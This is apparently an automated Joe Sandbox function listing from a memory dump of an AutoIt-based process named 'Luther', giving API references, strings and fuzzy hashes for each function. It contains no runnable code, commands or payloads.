Function 00E4A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00E4A916

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: e173f40ba0b54b447f3f662b99da9cb2383ca69090826246843101db7802abc5
Instruction ID: 4d6315d060f93b99e905122a2fb18860924cea2dd1e6c367b228f288b864b72d
Opcode Fuzzy Hash: e173f40ba0b54b447f3f662b99da9cb2383ca69090826246843101db7802abc5
Instruction Fuzzy Hash: 58516832504246DFCB25EF28E441AFA7BA0EF55324FA85069FDA9BB2D0DB309D42C751

Function 00E4F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00E4F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 00E4F6F4

Strings

@, xrefs: 00E4F6E8

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: dc5543f9632446957bce8b357242b73d1f50389b98a5566b45229b5d1b40389d
Instruction ID: 219fb51202367e3e140040ec36d497750029f0c52091834d83e75faa4931398f
Opcode Fuzzy Hash: dc5543f9632446957bce8b357242b73d1f50389b98a5566b45229b5d1b40389d
Instruction Fuzzy Hash: 805148B14087489FD320AF11DC8ABABBBECFB84300F81485DF1D9611A1DB718529CB66

Function 00EADB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00EADB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EADB7F

Strings

|, xrefs: 00EADB50

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: b4dcfa2f23a41024417ea65005429e85724b906fa9e4056dfda6955ac91048cd
Instruction ID: 3bfa1544d745563a58bf890a67a45537745caeb4c83d2ed0ec58478e81aae5e9
Opcode Fuzzy Hash: b4dcfa2f23a41024417ea65005429e85724b906fa9e4056dfda6955ac91048cd
Instruction Fuzzy Hash: 04315071801209ABCF05DFA4CD499EEBFB9FF09314F501029F915B6162EB719A06CB50

Function 00EC4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00EC40BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EC40F8

Strings

static, xrefs: 00EC4058

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: e5262e569e659119e8d142af9a4f0d4f8d4e5fafee22eb20eda2ba1b234cbb58
Instruction ID: 978385bff65458d250af52f7fbf05850caa9e664a084dc02eda8b92cb010112a
Opcode Fuzzy Hash: e5262e569e659119e8d142af9a4f0d4f8d4e5fafee22eb20eda2ba1b234cbb58
Instruction Fuzzy Hash: AC31B2B1100604AEDB14DF24CC51FFB77A9FF48724F00961DF995A7190CA32AC82C761

Function 00EC4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00EC50BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EC50D2

Strings

', xrefs: 00EC502C

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: ccaf5661bf4f35bf87e95b858aaf4c9185415458948fa086314cf19efff82398
Instruction ID: fce6dac68cda70c2cdcfdadf6627582b0e02e7813ec41c03f4d6748babcfe9e5
Opcode Fuzzy Hash: ccaf5661bf4f35bf87e95b858aaf4c9185415458948fa086314cf19efff82398
Instruction Fuzzy Hash: 82313775A0060A9FDB04CF65C981FDA7BB5FF09304F20506AE904EB391D772A986CF90

Function 00EC41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00E37873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E378B1
Part of subcall function 00E37873: GetStockObject.GDI32(00000011), ref: 00E378C5
Part of subcall function 00E37873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E378CF

GetWindowRect.USER32(00000000,?), ref: 00EC4216
GetSysColor.USER32(00000012), ref: 00EC4230

Strings

static, xrefs: 00EC41F3

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: dc0aa4cc04042989aff45303b38a94e86837de02faf3a3f039d561dbd7917eb6
Instruction ID: 0eb3477fdb6310b7b18f7f5c4e3427fb2b93643c28d0d0e018294d9de437ba09
Opcode Fuzzy Hash: dc0aa4cc04042989aff45303b38a94e86837de02faf3a3f039d561dbd7917eb6
Instruction Fuzzy Hash: D01126B2610209AFDB05DFA8CD46EEA7BE8EB08318F015528FD55E3250D636E852DB60

Function 00EAD763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EAD7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EAD7EB

Strings

<local>, xrefs: 00EAD7AB

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 7727d95d5bb7d19b724290dc22b9c95a5aeed0368da3194ef2ee18bd9efdc535
Instruction ID: 7bf648120c5e3ce55ffe45e2925368b17c2fec72753454cb557f916fddcf5ea2
Opcode Fuzzy Hash: 7727d95d5bb7d19b724290dc22b9c95a5aeed0368da3194ef2ee18bd9efdc535
Instruction Fuzzy Hash: 5A11067110923279D73C4B668C49EF7BE9CEB177A8F00522BB50AA6480D670A840C6F0

Function 00E975ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

CharUpperBuffW.USER32(?,?,?), ref: 00E9761D
_wcslen.LIBCMT ref: 00E97629

Strings

STOP, xrefs: 00E97623, 00E97628

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 332425a98c20526ac4c476e21357ef54d9e9d4b2347178364d96dbd89368bdbf
Instruction ID: 473b534e24964e73abaafac8a8d8684c9907d67f23b894540363f3d6e2e7fef5
Opcode Fuzzy Hash: 332425a98c20526ac4c476e21357ef54d9e9d4b2347178364d96dbd89368bdbf
Instruction Fuzzy Hash: A201C432628A268BCF10AEBDCC459BF77B5AB60758B501524E8A2B6192EB31D908C650

Function 00E9262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E92699

Strings

ComboBox, xrefs: 00E92638
ListBox, xrefs: 00E92663

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 4a724c28e8be00dd83e8d06a658d0057629ef728f7d6db52ba889cb567658834
Instruction ID: 54061b71fdf46be35db40fffd16e4e8e1ba4b0ac05d3de1bf8630ea8e8ecc833
Opcode Fuzzy Hash: 4a724c28e8be00dd83e8d06a658d0057629ef728f7d6db52ba889cb567658834
Instruction Fuzzy Hash: 3501B175600228BBCF04ABA4CC55DFE77A8EF86350F40262EAA33B72C2DA715809C650

Function 00E92525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00E92593

Strings

ComboBox, xrefs: 00E92532
ListBox, xrefs: 00E9255D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: db6d93d385d84f84df4475db97c35c994ec63497082a5c157a30d836e9cf11f0
Instruction ID: 5cef02059d6683e2a57815ae4fe809552856e25fa05ab2e3ac834e3ccbce9f7d
Opcode Fuzzy Hash: db6d93d385d84f84df4475db97c35c994ec63497082a5c157a30d836e9cf11f0
Instruction Fuzzy Hash: DE01A7756401087BCF05E7A0C966EFE77E8DF45344F5020297A03B72C1DA619E09C6B2

Function 00E925A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00E92615

Strings

ComboBox, xrefs: 00E925B6
ListBox, xrefs: 00E925E1

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 336de049beb58e10db0ce40b9428f43611c54b9f91323c000f74a4a14448df1a
Instruction ID: 66197362a34ea95422785c99a7c6c1feaeff2cf4fbd5559dbd57af90fe4e22a6
Opcode Fuzzy Hash: 336de049beb58e10db0ce40b9428f43611c54b9f91323c000f74a4a14448df1a
Instruction Fuzzy Hash: EF01A2B6A401087BCF15E7A0C905EFE77E89B05344F50202ABA03F7282DA619E09D6B1

Function 00E926B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

Part of subcall function 00E945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E94620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00E92720

Strings

ComboBox, xrefs: 00E926C2
ListBox, xrefs: 00E926ED

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 73ed5088c2dc1c42ca816c35de0e854ed46accaeb1d262595d91afbf828216c3
Instruction ID: 8de6884957d0c04d2acdf01014d450fc8e790f841113fd472cc9367459931308
Opcode Fuzzy Hash: 73ed5088c2dc1c42ca816c35de0e854ed46accaeb1d262595d91afbf828216c3
Instruction Fuzzy Hash: 63F0A475A402187BCF15B7A4CC55FFE77A8AF05754F40292AB623B72C2DBB1580DC660

Function 00E63A62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

Strings

j3, xrefs: 00E63A88
2<, xrefs: 00E63A64

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID:
String ID: 2<$j3
API String ID: 0-463933582
Opcode ID: 27feb05ed8b8906ebd8b5e95a8a98e80ecfd5294d9550c34c8ffddcac8427dec
Instruction ID: f0c7f2d572c7329e29097658e6851d357f9f2ee945137d3c5343ec16147eb1a0
Opcode Fuzzy Hash: 27feb05ed8b8906ebd8b5e95a8a98e80ecfd5294d9550c34c8ffddcac8427dec
Instruction Fuzzy Hash: 5EF0F028104148AADB108FE1DC40AF977B8DF04780F00406ABCCAE7280FA758F81E365

Function 00E91461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E9146F

Strings

AutoIt, xrefs: 00E91463
Error allocating memory., xrefs: 00E91468

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 4b34c5ee94a6a9c9453480195f0c81068e6398c25e851cd31fde9b36a52f68e4
Instruction ID: 6153acfdf7694d4decca037566601119638578a7bffe0d11885d93773b309a11
Opcode Fuzzy Hash: 4b34c5ee94a6a9c9453480195f0c81068e6398c25e851cd31fde9b36a52f68e4
Instruction Fuzzy Hash: E4E0D832249B283BD2102794AD03FC57AC48F04B56F11583EFB88754C24EE324508299

Function 00E510B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00E4FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E510E2,?,?,?,00E3100A), ref: 00E4FAD9

IsDebuggerPresent.KERNEL32(?,?,?,00E3100A), ref: 00E510E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E3100A), ref: 00E510F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E510F0

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 5a3b847711710c40babac1e6443fa9978e2104e62709db050edd0b901394a8f6
Instruction ID: 27d1158c37b1b3114247b7b710c684482ee372e0d572b23551d95e7271557eef
Opcode Fuzzy Hash: 5a3b847711710c40babac1e6443fa9978e2104e62709db050edd0b901394a8f6
Instruction Fuzzy Hash: 65E06D706007508FD3249F25EA09742BBE4EB00705F049DADEC85E2291DBB5E449CBA1

Function 00EA39D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00EA39F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00EA3A05

Strings

aut, xrefs: 00EA39F9

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 7877ff6d01301fe498b76ce94b3c70fd7fa9b6e96e111da36d263a36770be824
Instruction ID: 0eba368c2cf140501467b42cc0e9bc9ae7c41e804a3767e379dc7ab64811e76b
Opcode Fuzzy Hash: 7877ff6d01301fe498b76ce94b3c70fd7fa9b6e96e111da36d263a36770be824
Instruction Fuzzy Hash: 21D05B71504318ABDA2097559C0DFDB7A6CDB44710F0001B1BE95A10A1DAB1D549C790

Function 00EC2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EC2E08
PostMessageW.USER32(00000000), ref: 00EC2E0F

Part of subcall function 00E9F292: Sleep.KERNEL32 ref: 00E9F30A

Strings

Shell_TrayWnd, xrefs: 00EC2E01

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 4fc036c0a9afac20e6c80e6599e6e824f08809541f55c11ff714c3729558f3c3
Instruction ID: f5b182c9927ccd1da3bfcbe571429d06cf12a5e001a40eeb24ac625afbf814b5
Opcode Fuzzy Hash: 4fc036c0a9afac20e6c80e6599e6e824f08809541f55c11ff714c3729558f3c3
Instruction Fuzzy Hash: FAD0A931389300AAE668B331AC0BFD26A549B00B00F100835B345FA0D0C8A26801C644

Function 00EC2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EC2DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EC2DDB

Part of subcall function 00E9F292: Sleep.KERNEL32 ref: 00E9F30A

Strings

Shell_TrayWnd, xrefs: 00EC2DC1

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e5bb9e29e0e693666c5c8bad29d7e149b887203f88e68eaec892ee24fbca4ca8
Instruction ID: a10a8b0c17bf66eded9803220b305f0b86da7409bf730bf0421aec0ecf2c69fc
Opcode Fuzzy Hash: e5bb9e29e0e693666c5c8bad29d7e149b887203f88e68eaec892ee24fbca4ca8
Instruction Fuzzy Hash: 10D02235398300BBE668B331AC0FFE27B549F00B00F100835B349FA0D0C8F26801C640

Function 00E6C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00E6C213
GetLastError.KERNEL32 ref: 00E6C221
